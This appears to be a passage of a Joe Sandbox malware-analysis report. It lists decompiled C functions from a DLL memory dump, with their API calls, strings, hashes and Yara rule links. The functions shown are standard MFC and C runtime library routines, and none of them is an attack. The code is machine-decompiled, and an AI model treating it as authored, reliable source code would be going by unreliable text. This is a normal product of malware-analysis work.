_sscanf.LIBCMT ref: 1000ABBF
ConvertDefaultLocale.KERNEL32(?), ref: 1000ABF4
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 1000ABFA
RegCloseKey.ADVAPI32(?), ref: 1000AC09
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1000AC19
EnumResourceLanguagesA.KERNEL32 ref: 1000AC34
ConvertDefaultLocale.KERNEL32(?), ref: 1000AC65
ConvertDefaultLocale.KERNEL32(74784EE0), ref: 1000AC6B
_memset.LIBCMT ref: 1000AC85

Strings

GetUserDefaultUILanguage, xrefs: 1000AA82
Control Panel\Desktop\ResourceLocale, xrefs: 1000AB6D
GetSystemDefaultUILanguage, xrefs: 1000AACB
ntdll.dll, xrefs: 1000AC14
kernel32.dll, xrefs: 1000AA6C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction ID: 772d67b6ef5536ffa942379cc2d037747f9683b4a435f76ff704d577c4812cba
Opcode Fuzzy Hash: 391a7af3d11bcdbc6c68bf10dbaf9488a7631794da5acccd773ff9b8d76e3d4f
Instruction Fuzzy Hash: 638182B0D002699FEB10DFA5DC84AFEBBF9FB49350F500626E554E7280DB749A85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C11B, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E1001C11B(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x1005aea4 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1005aea8 = GetProcAddress(_t37, "FlsGetValue");
					 *0x1005aeac = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x1005aea4;
					_t40 = TlsSetValue;
					 *0x1005aeb0 = _t7;
					if( *0x1005aea4 == 0) {
						L6:
						 *0x1005aea8 = TlsGetValue;
						 *0x1005aea4 = E1001BDD2;
						 *0x1005aeac = _t40;
						 *0x1005aeb0 = TlsFree;
					} else {
						__eflags =  *0x1005aea8;
						if( *0x1005aea8 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1005aeac;
							if( *0x1005aeac == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10057d30 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1005aea8);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10018042();
							 *0x1005aea4 = E1001BD03( *0x1005aea4);
							 *0x1005aea8 = E1001BD03( *0x1005aea8);
							 *0x1005aeac = E1001BD03( *0x1005aeac);
							 *0x1005aeb0 = E1001BD03( *0x1005aeb0);
							_t18 = E1001A3D3();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E1001BE05();
								goto L15;
							} else {
								_push(E1001BF91);
								_t21 =  *((intOrPtr*)(E1001BD6F( *0x1005aea4)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10057d2c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1001E76E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10057d2c);
										__eflags =  *((intOrPtr*)(E1001BD6F( *0x1005aeac)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E1001BE42(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E1001BE05();
					return 0;
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
__mtterm.LIBCMT ref: 1001C12D

Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001F,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
__init_pointers.LIBCMT ref: 1001C1DF
__encode_pointer.LIBCMT ref: 1001C1EA
__encode_pointer.LIBCMT ref: 1001C1FA
__encode_pointer.LIBCMT ref: 1001C20A
__encode_pointer.LIBCMT ref: 1001C21A
__decode_pointer.LIBCMT ref: 1001C23B
__calloc_crt.LIBCMT ref: 1001C254
__decode_pointer.LIBCMT ref: 1001C26E
__initptd.LIBCMT ref: 1001C27D
GetCurrentThreadId.KERNEL32 ref: 1001C284

Strings

FlsAlloc, xrefs: 1001C13D
KERNEL32.DLL, xrefs: 1001C11C
FlsSetValue, xrefs: 1001C152
FlsFree, xrefs: 1001C15F
FlsGetValue, xrefs: 1001C145

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011389, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E10017C2A(E1002866E, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a0f5);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x1005acbc;
						if( *0x1005acbc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005a8dc;
								if( *0x1005a8dc != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10011245);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E100174D0(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32(?,?,?,?), ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32(?,000000FC,Function_0001025C), ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32(?,000000FC,Function_00011245), ref: 1001159C
CallNextHookEx.USER32(?,00000003,?,?), ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

#32768, xrefs: 100114F6, 100114FB, 10011545
ime, xrefs: 1001144E
AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

MonitorFromPoint, xrefs: 1000D735
MonitorFromWindow, xrefs: 1000D713
GetMonitorInfoA, xrefs: 1000D757
GetSystemMetrics, xrefs: 1000D702
MonitorFromRect, xrefs: 1000D724
USER32, xrefs: 1000D6E2
EnumDisplayMonitors, xrefs: 1000D746
EnumDisplayDevicesA, xrefs: 1000D768

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

KERNEL32, xrefs: 1000A216
ActivateActCtx, xrefs: 1000A248
CreateActCtxA, xrefs: 1000A233
DeactivateActCtx, xrefs: 1000A255
ReleaseActCtx, xrefs: 1000A23B

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
